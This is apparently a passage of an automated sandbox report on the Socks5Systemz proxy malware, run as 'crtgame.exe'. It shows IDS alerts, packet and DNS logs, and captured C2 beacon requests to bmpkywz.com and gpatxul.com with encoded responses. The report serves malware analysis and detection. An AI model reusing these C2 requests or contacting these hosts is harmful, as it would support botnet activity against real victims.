                                                                                  comctl32.dllInitCommonControls
                                                                                  advapi32.dllAdjustTokenPrivileges
                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                  DutchNetherlands
                                                                                  EnglishUnited States
                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                  2024-12-14T12:03:18.946257+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54981894.232.249.18780TCP
                                                                                  2024-12-14T12:03:18.946257+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54981894.232.249.18780TCP
                                                                                  2024-12-14T12:03:32.086598+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54984994.232.249.18780TCP
                                                                                  2024-12-14T12:03:32.086598+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54984994.232.249.18780TCP
                                                                                  2024-12-14T12:03:45.242156+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54987994.232.249.18780TCP
                                                                                  2024-12-14T12:03:45.242156+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54987994.232.249.18780TCP
                                                                                  2024-12-14T12:03:51.955829+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549911185.237.206.12980TCP
                                                                                  2024-12-14T12:03:51.955829+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.549911185.237.206.12980TCP
                                                                                  2024-12-14T12:03:55.782950+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549911185.237.206.12980TCP
                                                                                  2024-12-14T12:03:55.782950+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.549911185.237.206.12980TCP
                                                                                  2024-12-14T12:03:57.296460+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549923185.237.206.12980TCP
                                                                                  2024-12-14T12:03:57.296460+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.549923185.237.206.12980TCP
                                                                                  2024-12-14T12:03:58.928983+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549929185.237.206.12980TCP
                                                                                  2024-12-14T12:03:58.928983+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.549929185.237.206.12980TCP
                                                                                  2024-12-14T12:04:00.442523+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549935185.237.206.12980TCP
                                                                                  2024-12-14T12:04:00.442523+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.549935185.237.206.12980TCP
                                                                                  2024-12-14T12:04:01.954791+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549937185.237.206.12980TCP
                                                                                  2024-12-14T12:04:01.954791+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.549937185.237.206.12980TCP
                                                                                  2024-12-14T12:04:03.481805+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549942185.237.206.12980TCP
                                                                                  2024-12-14T12:04:03.481805+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.549942185.237.206.12980TCP
                                                                                  2024-12-14T12:04:05.048266+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549948185.237.206.12980TCP
                                                                                  2024-12-14T12:04:05.048266+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.549948185.237.206.12980TCP
                                                                                  2024-12-14T12:04:06.703781+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549951185.237.206.12980TCP
                                                                                  2024-12-14T12:04:06.703781+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.549951185.237.206.12980TCP
                                                                                  2024-12-14T12:04:08.238263+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549955185.237.206.12980TCP
                                                                                  2024-12-14T12:04:08.238263+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.549955185.237.206.12980TCP
                                                                                  2024-12-14T12:04:09.749286+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549961185.237.206.12980TCP
                                                                                  2024-12-14T12:04:09.749286+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.549961185.237.206.12980TCP
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Dec 14, 2024 12:03:10.821400881 CET4981880192.168.2.594.232.249.187
                                                                                  Dec 14, 2024 12:03:10.942506075 CET804981894.232.249.187192.168.2.5
                                                                                  Dec 14, 2024 12:03:10.942735910 CET4981880192.168.2.594.232.249.187
                                                                                  Dec 14, 2024 12:03:10.942848921 CET4981880192.168.2.594.232.249.187
                                                                                  Dec 14, 2024 12:03:11.062629938 CET804981894.232.249.187192.168.2.5
                                                                                  Dec 14, 2024 12:03:18.946257114 CET4981880192.168.2.594.232.249.187
                                                                                  Dec 14, 2024 12:03:23.961308956 CET4984980192.168.2.594.232.249.187
                                                                                  Dec 14, 2024 12:03:24.081054926 CET804984994.232.249.187192.168.2.5
                                                                                  Dec 14, 2024 12:03:24.082534075 CET4984980192.168.2.594.232.249.187
                                                                                  Dec 14, 2024 12:03:24.082729101 CET4984980192.168.2.594.232.249.187
                                                                                  Dec 14, 2024 12:03:24.202835083 CET804984994.232.249.187192.168.2.5
                                                                                  Dec 14, 2024 12:03:32.086597919 CET4984980192.168.2.594.232.249.187
                                                                                  Dec 14, 2024 12:03:37.104763031 CET4987980192.168.2.594.232.249.187
                                                                                  Dec 14, 2024 12:03:37.229978085 CET804987994.232.249.187192.168.2.5
                                                                                  Dec 14, 2024 12:03:37.230397940 CET4987980192.168.2.594.232.249.187
                                                                                  Dec 14, 2024 12:03:37.230643034 CET4987980192.168.2.594.232.249.187
                                                                                  Dec 14, 2024 12:03:37.350454092 CET804987994.232.249.187192.168.2.5
                                                                                  Dec 14, 2024 12:03:45.242156029 CET4987980192.168.2.594.232.249.187
                                                                                  Dec 14, 2024 12:03:50.504309893 CET4991180192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:03:50.625987053 CET8049911185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:03:50.626123905 CET4991180192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:03:50.626348972 CET4991180192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:03:50.748233080 CET8049911185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:03:51.954881907 CET8049911185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:03:51.955828905 CET4991180192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:03:51.957559109 CET499142023192.168.2.546.8.225.74
                                                                                  Dec 14, 2024 12:03:52.077395916 CET20234991446.8.225.74192.168.2.5
                                                                                  Dec 14, 2024 12:03:52.078052044 CET499142023192.168.2.546.8.225.74
                                                                                  Dec 14, 2024 12:03:52.078131914 CET499142023192.168.2.546.8.225.74
                                                                                  Dec 14, 2024 12:03:52.198174953 CET20234991446.8.225.74192.168.2.5
                                                                                  Dec 14, 2024 12:03:52.198370934 CET499142023192.168.2.546.8.225.74
                                                                                  Dec 14, 2024 12:03:52.318319082 CET20234991446.8.225.74192.168.2.5
                                                                                  Dec 14, 2024 12:03:53.348917961 CET20234991446.8.225.74192.168.2.5
                                                                                  Dec 14, 2024 12:03:53.398168087 CET499142023192.168.2.546.8.225.74
                                                                                  Dec 14, 2024 12:03:55.351862907 CET4991180192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:03:55.471793890 CET8049911185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:03:55.782871008 CET8049911185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:03:55.782949924 CET4991180192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:03:55.898997068 CET4991180192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:03:55.899364948 CET4992380192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:03:56.019125938 CET8049911185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:03:56.019238949 CET8049923185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:03:56.019299984 CET4991180192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:03:56.019448042 CET4992380192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:03:56.019552946 CET4992380192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:03:56.144100904 CET8049923185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:03:57.295629025 CET8049923185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:03:57.296459913 CET4992380192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:03:57.296968937 CET499282023192.168.2.546.8.225.74
                                                                                  Dec 14, 2024 12:03:57.417638063 CET20234992846.8.225.74192.168.2.5
                                                                                  Dec 14, 2024 12:03:57.417912006 CET499282023192.168.2.546.8.225.74
                                                                                  Dec 14, 2024 12:03:57.417912006 CET499282023192.168.2.546.8.225.74
                                                                                  Dec 14, 2024 12:03:57.417912006 CET499282023192.168.2.546.8.225.74
                                                                                  Dec 14, 2024 12:03:57.523525000 CET4992380192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:03:57.523713112 CET4992980192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:03:57.537935972 CET20234992846.8.225.74192.168.2.5
                                                                                  Dec 14, 2024 12:03:57.580161095 CET20234992846.8.225.74192.168.2.5
                                                                                  Dec 14, 2024 12:03:57.648238897 CET8049929185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:03:57.648308039 CET8049923185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:03:57.648463011 CET4992980192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:03:57.648555040 CET4992380192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:03:57.648672104 CET4992980192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:03:57.768466949 CET8049929185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:03:58.391365051 CET20234992846.8.225.74192.168.2.5
                                                                                  Dec 14, 2024 12:03:58.391782045 CET499282023192.168.2.546.8.225.74
                                                                                  Dec 14, 2024 12:03:58.928916931 CET8049929185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:03:58.928982973 CET4992980192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:03:59.039278984 CET4992980192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:03:59.039573908 CET4993580192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:03:59.162322044 CET8049929185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:03:59.162348986 CET8049935185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:03:59.162478924 CET4992980192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:03:59.162489891 CET4993580192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:03:59.162739038 CET4993580192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:03:59.284961939 CET8049935185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:00.442317963 CET8049935185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:00.442523003 CET4993580192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:00.560285091 CET4993580192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:00.560697079 CET4993780192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:00.681296110 CET8049935185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:00.681397915 CET8049937185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:00.681444883 CET4993580192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:00.681615114 CET4993780192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:00.681715965 CET4993780192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:00.801944017 CET8049937185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:01.954699993 CET8049937185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:01.954791069 CET4993780192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:02.070297956 CET4993780192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:02.070848942 CET4994280192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:02.196027040 CET8049937185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:02.196038008 CET8049942185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:02.196089029 CET4993780192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:02.196180105 CET4994280192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:02.196254969 CET4994280192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:02.316817045 CET8049942185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:03.479429007 CET8049942185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:03.481805086 CET4994280192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:03.604144096 CET4994280192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:03.604629040 CET4994880192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:03.724678993 CET8049942185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:03.724724054 CET8049948185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:03.724836111 CET4994280192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:03.724870920 CET4994880192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:03.725128889 CET4994880192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:03.844990969 CET8049948185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:05.047827005 CET8049948185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:05.048265934 CET4994880192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:05.166268110 CET4994880192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:05.166565895 CET4995180192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:05.293555975 CET8049951185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:05.293615103 CET8049948185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:05.293654919 CET4995180192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:05.293699026 CET4994880192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:05.293818951 CET4995180192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:05.537107944 CET8049951185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:06.699769020 CET8049951185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:06.703780890 CET4995180192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:06.838131905 CET4995180192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:06.838283062 CET4995580192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:06.958087921 CET8049955185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:06.958304882 CET4995580192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:06.958384991 CET4995580192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:06.958441973 CET8049951185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:06.958626032 CET4995180192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:07.078490973 CET8049955185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:08.238189936 CET8049955185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:08.238262892 CET4995580192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:08.353626966 CET4995580192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:08.354020119 CET4996180192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:08.473787069 CET8049955185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:08.473855972 CET4995580192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:08.473988056 CET8049961185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:08.474240065 CET4996180192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:08.474240065 CET4996180192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:08.594677925 CET8049961185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:09.749092102 CET8049961185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:09.749285936 CET4996180192.168.2.5185.237.206.129
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Dec 14, 2024 12:02:58.445082903 CET5457853192.168.2.5194.49.94.194
                                                                                  Dec 14, 2024 12:02:59.446168900 CET5457853192.168.2.5194.49.94.194
                                                                                  Dec 14, 2024 12:03:00.460618973 CET5457853192.168.2.5194.49.94.194
                                                                                  Dec 14, 2024 12:03:02.476444006 CET5457853192.168.2.5194.49.94.194
                                                                                  Dec 14, 2024 12:03:06.476913929 CET5457853192.168.2.5194.49.94.194
                                                                                  Dec 14, 2024 12:03:10.493789911 CET6244253192.168.2.5152.89.198.214
                                                                                  Dec 14, 2024 12:03:10.772625923 CET5362442152.89.198.214192.168.2.5
                                                                                  Dec 14, 2024 12:03:50.259462118 CET6008753192.168.2.581.31.197.38
                                                                                  Dec 14, 2024 12:03:50.499217987 CET536008781.31.197.38192.168.2.5
                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Dec 14, 2024 12:02:58.445082903 CET192.168.2.5194.49.94.1940x7153Standard query (0)bmpkywz.comA (IP address)IN (0x0001)false
                                                                                  Dec 14, 2024 12:02:59.446168900 CET192.168.2.5194.49.94.1940x7153Standard query (0)bmpkywz.comA (IP address)IN (0x0001)false
                                                                                  Dec 14, 2024 12:03:00.460618973 CET192.168.2.5194.49.94.1940x7153Standard query (0)bmpkywz.comA (IP address)IN (0x0001)false
                                                                                  Dec 14, 2024 12:03:02.476444006 CET192.168.2.5194.49.94.1940x7153Standard query (0)bmpkywz.comA (IP address)IN (0x0001)false
                                                                                  Dec 14, 2024 12:03:06.476913929 CET192.168.2.5194.49.94.1940x7153Standard query (0)bmpkywz.comA (IP address)IN (0x0001)false
                                                                                  Dec 14, 2024 12:03:10.493789911 CET192.168.2.5152.89.198.2140x3f89Standard query (0)bmpkywz.comA (IP address)IN (0x0001)false
                                                                                  Dec 14, 2024 12:03:50.259462118 CET192.168.2.581.31.197.380x5f44Standard query (0)gpatxul.comA (IP address)IN (0x0001)false
                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Dec 14, 2024 12:03:10.772625923 CET152.89.198.214192.168.2.50x3f89No error (0)bmpkywz.com94.232.249.187A (IP address)IN (0x0001)false
                                                                                  Dec 14, 2024 12:03:50.499217987 CET81.31.197.38192.168.2.50x5f44No error (0)gpatxul.com185.237.206.129A (IP address)IN (0x0001)false
                                                                                  • bmpkywz.com
                                                                                  • gpatxul.com
                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.54981894.232.249.187807156C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 14, 2024 12:03:10.942848921 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f538166429e289d5b86953e226c55f676647fc2813369d184da3259568edc02f819c8 HTTP/1.1
                                                                                  Host: bmpkywz.com
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.54984994.232.249.187807156C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 14, 2024 12:03:24.082729101 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f538166429e289d5b86953e226c55f676647fc2813369d184da3259568edc02f819c8 HTTP/1.1
                                                                                  Host: bmpkywz.com
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.54987994.232.249.187807156C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 14, 2024 12:03:37.230643034 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f538166429e289d5b86953e226c55f676647fc2813369d184da3259568edc02f819c8 HTTP/1.1
                                                                                  Host: bmpkywz.com
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.549911185.237.206.129807156C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 14, 2024 12:03:50.626348972 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f538166429e289d5b86953e226c55f676647fc2813369d184da3259568edc02f819c8 HTTP/1.1
                                                                                  Host: gpatxul.com
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                  Dec 14, 2024 12:03:51.954881907 CET840INHTTP/1.1 200 OK
                                                                                  Server: nginx/1.20.1
                                                                                  Date: Sat, 14 Dec 2024 11:03:51 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  X-Powered-By: PHP/7.4.33
                                                                                  Data Raw: 32 37 38 0d 0a 64 65 32 66 66 65 39 31 32 63 31 61 35 32 35 39 65 62 32 33 36 34 33 64 36 63 30 32 61 37 35 39 33 63 65 30 30 64 35 34 39 39 35 31 30 65 64 66 65 66 66 36 64 37 66 64 65 33 34 32 38 62 32 30 33 39 33 38 30 33 63 32 64 36 34 37 38 63 30 66 30 35 39 34 32 30 63 65 31 62 65 35 34 39 65 39 62 31 65 38 34 66 39 66 35 34 38 39 33 38 30 31 39 34 33 30 38 32 35 30 39 62 39 36 33 64 32 32 36 63 34 33 61 39 32 30 32 33 37 34 64 64 39 35 36 33 32 65 39 36 38 61 64 64 32 62 35 62 35 35 38 63 64 31 30 37 66 39 31 31 63 65 64 32 35 35 62 36 33 38 33 64 31 39 34 61 63 61 35 38 32 34 63 35 35 64 66 39 33 35 38 39 34 33 34 37 61 65 32 64 65 31 61 32 31 32 38 65 35 39 35 63 61 33 61 39 61 31 38 62 66 35 63 39 61 37 35 35 65 61 66 38 62 37 39 38 64 66 32 64 33 38 38 35 31 64 61 33 33 36 65 64 36 66 31 64 61 31 61 37 37 66 61 39 30 34 64 35 62 36 37 38 39 38 31 34 61 34 63 33 39 30 32 36 34 62 39 63 62 61 63 66 32 64 39 61 65 35 39 63 65 31 31 66 66 63 34 63 64 61 35 33 32 66 63 35 32 31 61 38 39 61 33 [TRUNCATED]
                                                                                  Data Ascii: 278de2ffe912c1a5259eb23643d6c02a7593ce00d5499510edfeff6d7fde3428b20393803c2d6478c0f059420ce1be549e9b1e84f9f54893801943082509b963d226c43a9202374dd95632e968add2b5b558cd107f911ced255b6383d194aca5824c55df935894347ae2de1a2128e595ca3a9a18bf5c9a755eaf8b798df2d38851da336ed6f1da1a77fa904d5b6789814a4c390264b9cbacf2d9ae59ce11ffc4cda532fc521a89a3bc17908554995c3f3dde675794b2a3bb361ebbd27333cabce6765381feb9c645b4baa40b3b3fbd53721111d245bdb05d8560a57f41b073f94f0c1789289d889114a32c2a4446ee6fa795796ec48841cf61f42803bc5fabf2550ed72c6672363ac4deaf7d6193319c9b788c3cdfd003c9e0277db59758f7d83cb2b530c3d7b0ace834297d2c77a3bda8acf397c14bc274ad3d63e4a2b0
                                                                                  Dec 14, 2024 12:03:55.351862907 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1
                                                                                  Host: gpatxul.com
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                  Dec 14, 2024 12:03:55.782871008 CET220INHTTP/1.1 200 OK
                                                                                  Server: nginx/1.20.1
                                                                                  Date: Sat, 14 Dec 2024 11:03:55 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  X-Powered-By: PHP/7.4.33
                                                                                  Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: ede2ff49a2e11370


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.549923185.237.206.129807156C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 14, 2024 12:03:56.019552946 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1
                                                                                  Host: gpatxul.com
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                  Dec 14, 2024 12:03:57.295629025 CET702INHTTP/1.1 200 OK
                                                                                  Server: nginx/1.20.1
                                                                                  Date: Sat, 14 Dec 2024 11:03:57 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  X-Powered-By: PHP/7.4.33
                                                                                  Data Raw: 31 65 65 0d 0a 64 65 32 66 65 38 38 65 32 36 31 64 34 37 34 39 62 39 36 34 37 38 33 39 33 39 36 39 66 38 30 37 33 39 66 66 30 65 35 35 38 32 34 65 30 65 64 39 65 37 61 36 39 32 62 65 61 35 32 63 63 31 36 34 36 61 37 64 35 62 63 66 64 36 35 61 64 63 34 39 34 37 64 32 34 64 39 33 35 38 66 36 34 62 65 65 61 63 66 37 34 39 39 62 35 63 39 36 33 39 30 31 39 33 32 35 38 61 35 63 38 36 39 65 33 61 33 63 36 64 34 37 61 37 33 66 32 32 37 36 63 61 39 64 36 36 32 64 38 38 38 39 64 30 33 32 35 32 34 63 38 65 64 66 30 37 65 37 31 33 63 63 64 62 34 32 62 30 32 36 33 35 31 63 35 34 63 62 35 63 32 61 64 61 35 38 66 35 32 32 38 35 34 31 35 39 61 61 32 63 66 34 61 34 31 63 39 37 35 32 35 39 61 32 62 37 61 33 38 32 66 66 64 35 62 61 35 37 65 30 66 39 61 39 39 39 64 39 32 37 32 37 38 33 31 31 62 38 33 61 65 61 37 31 31 39 61 30 62 32 37 38 61 37 31 64 64 64 62 34 37 64 38 36 31 30 61 39 64 35 39 33 33 63 34 33 39 39 62 38 64 31 32 37 39 64 65 32 38 30 66 65 31 65 66 63 35 38 64 66 35 30 32 66 64 62 32 38 61 65 39 37 32 [TRUNCATED]
                                                                                  Data Ascii: 1eede2fe88e261d4749b96478393969f80739ff0e55824e0ed9e7a692bea52cc1646a7d5bcfd65adc4947d24d9358f64beeacf7499b5c96390193258a5c869e3a3c6d47a73f2276ca9d662d8889d032524c8edf07e713ccdb42b026351c54cb5c2ada58f522854159aa2cf4a41c975259a2b7a382ffd5ba57e0f9a999d927278311b83aea7119a0b278a71dddb47d8610a9d5933c4399b8d1279de280fe1efc58df502fdb28ae972fc07a0d4b469ad9ecd8e9786749253cab62f2b028283da8c57a662618e09b7a5a4ea657b5affcda3c3f13192944d207ce5d0b56ea16072083f8c37c8c88d6860d5631c5a9596ce3ff6c5796e3538518c70


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.2.549929185.237.206.129807156C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 14, 2024 12:03:57.648672104 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1
                                                                                  Host: gpatxul.com
